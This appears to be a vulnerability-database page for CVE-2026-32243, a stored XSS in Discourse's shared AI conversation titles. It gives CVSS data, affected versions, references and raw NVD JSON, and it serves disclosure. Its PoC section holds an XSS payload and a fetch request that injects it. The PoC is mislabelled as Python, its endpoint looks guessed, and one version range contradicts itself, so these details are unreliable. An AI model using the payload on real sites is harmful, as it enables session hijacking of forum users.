CVE-2026-32243

Description

Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.3, 2026.2.0-latest to before 2026.2.2, and 2026.3.0-latest to before 2026.3.0, an attacker with the ability to create shared AI conversations could inject arbitrary HTML and JavaScript via crafted conversation titles. This payload would execute in the browser of any user viewing the onebox preview, potentially allowing session hijacking or unauthorized actions on behalf of the victim. This issue has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:* - VULNERABLE

cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest:*:*:* - VULNERABLE

cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest.1:*:*:* - VULNERABLE

Discourse >= 2026.1.0, < 2026.1.3

Discourse >= 2026.2.0, < 2026.2.2

Discourse >= 2026.3.0, < 2026.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-32243
// Concept: Injecting malicious script via AI Conversation Title

// 1. Attacker prepares the malicious payload
const xssPayload = '<img src=x onerror=alert(1)>';

// 2. Attacker sends a request to create a shared AI conversation
// Note: This requires a valid authenticated session
fetch('https://target.com/u/username/preferences/ai-conversations', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'X-CSRF-Token': 'YOUR_CSRF_TOKEN_HERE'
  },
  body: JSON.stringify({
    title: xssPayload,
    model: 'gpt-4',
    messages: []
  })
}).then(response => console.log('Payload injected'));

// 3. Trigger: When a victim views the Onebox preview of the conversation,
// the alert(1) will execute in their browser.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32243
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32243
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32243/
[4] VulDB https://vuldb.com/cve/CVE-2026-32243
[5] https://github.com/discourse/discourse/commit/cac7d618a562ce934f8dbf73cdb70066a4806b4c
[6] https://github.com/discourse/discourse/security/advisories/GHSA-pjc5-8x3w-rfwx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32243", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:49.740", "lastModified": "2026-04-09T19:31:50.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.3, 2026.2.0-latest to before 2026.2.2, and 2026.3.0-latest to before 2026.3.0, an attacker with the ability to create shared AI conversations could inject arbitrary HTML and JavaScript via crafted conversation titles. This payload would execute in the browser of any user viewing the onebox preview, potentially allowing session hijacking or unauthorized actions on behalf of the victim. This issue has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*", "versionStartIncluding": "2026.1.0", "versionEndExcluding": "2026.1.3", "matchCriteriaId": "F64DA8FA-BC32-4EB9-B508-6425684D3245"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*", "versionStartIncluding": "2026.2.0", "versionEndExcluding": "2026.2.2", "matchCriteriaId": "26546710-17B3-4C72-930F-3BE0AD969127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest:*:*:*", "matchCriteriaId": "E3FE9277-4F6B-4FD0-991F-F0FB8D226E1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest.1:*:*:*", "matchCriteriaId": "DFA536C2-E9D9-4A03-89C2-C344DE682EA1"}]}]}], "references": [{"url": "https://github.com/discourse/discourse/commit/cac7d618a562ce934f8dbf73cdb70066a4806b4c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/discourse/discourse/security/advisories/GHSA-pjc5-8x3w-rfwx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}